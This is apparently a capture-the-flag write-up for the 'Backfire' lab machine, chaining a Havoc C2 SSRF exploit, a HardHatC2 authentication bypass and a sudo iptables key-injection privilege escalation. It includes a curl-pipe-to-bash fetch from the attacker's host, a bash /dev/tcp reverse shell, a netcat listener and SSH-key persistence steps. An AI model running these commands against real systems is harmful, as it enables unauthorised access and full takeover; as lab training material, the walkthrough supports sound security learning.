Nmap Scan#

Performed a detailed enumeration of the target using Nmap:

nmap -sVC -v3 backfire.htb

Discovered Ports:

  • 22/tcp - OpenSSH 9.2p1
  • 443/tcp - nginx 1.22.1 with self-signed certificate
  • 8000/tcp - nginx 1.22.1 serving directory listing

Initial Access#

Reconnaissance#

Browsing to http://backfire.htb:8000/ revealed two files:

  • disable_tls.patch
  • havoc.yaotl

disable_tls.patch indicates TLS has been disabled on the Havoc Teamserver WebSocket (port 40056), exposing it for potential exploitation.

Havoc C2 SSRF Exploit#

Using a public exploit for Havoc C2:

Exploit: https://github.com/chebuya/Havoc-C2-SSRF-poc

Steps:#

  1. Clone and set up the exploit:
git clone https://github.com/chebuya/Havoc-C2-SSRF-poc.git
cd Havoc-C2-SSRF-poc
  1. Modify the exploit.py script:

Update the curl command:

cmd = "curl http://<YOUR_KALI_IP>:8000/payload.sh | bash"
  1. Create a reverse shell payload:
echo 'bash -i >& /dev/tcp/<YOUR_KALI_IP>/9002 0>&1' > payload.sh
  1. Start a simple HTTP server:
updog -p 8000
  1. Listen for reverse shell:
nc -lvnp 9002
  1. Run the exploit:
python3 exploit.py --target https://backfire.htb -i 127.0.0.1 -p 40056
  1. Catch the reverse shell.

Persistence via SSH#

To maintain access after getting a shell:

  1. Generate SSH keys:
ssh-keygen
cat ~/.ssh/id_ed25519.pub
  1. On the target:
echo "<YOUR_SSH_PUBLIC_KEY>" >> ~/.ssh/authorized_keys
  1. SSH in:
ssh ilya@backfire.htb

Lateral Movement#

Found hint regarding HardHatC2 in hardhat.txt. A known HardHatC2 auth bypass & RCE exists.

Reference Exploit:
https://blog.sth.sh/hardhatc2-0-days-rce-authn-bypass-96ba683d9dd7

Steps:#

  1. Port-forward internal ports:
ssh -L 5000:127.0.0.1:5000 ilya@backfire.htb
ssh -L 7096:127.0.0.1:7096 ilya@backfire.htb

  1. Use exploit2.py to generate an admin JWT and create a new HardHatC2 user.

  2. Log in to HardHatC2 at https://127.0.0.1:5000/ using:

Username: sth_pentest
Password: sth_pentest

  1. Use the web interface to trigger a reverse shell.

  1. Stabilize access via SSH key injection, then SSH in as:
ssh sergej@backfire.htb

Privilege Escalation#

sudo Permissions:# 

sudo -l

Output:

  • (root) NOPASSWD: /usr/sbin/iptables
  • (root) NOPASSWD: /usr/sbin/iptables-save

Using the technique from Shielder’s iptables LPE:

Reference:
https://www.shielder.com/blog/2024/09/a-journey-from-sudo-iptables-to-local-privilege-escalation/

Steps:#

  1. Inject SSH key using iptables comment:
sudo iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\n<YOUR_SSH_PUBLIC_KEY>\n'
  1. Save iptables rules as root’s authorized_keys:
sudo iptables-save -f /root/.ssh/authorized_keys
  1. SSH as root:
ssh root@backfire.htb

Summary#

  • Initial Access: Exploit Havoc C2 SSRF to get reverse shell.
  • Lateral Movement: Exploit HardHatC2 authentication bypass.
  • Privilege Escalation: Abuse iptables with sudo to inject SSH key and escalate to root.

A successful chain of real-world vulnerabilities leading to complete system compromise.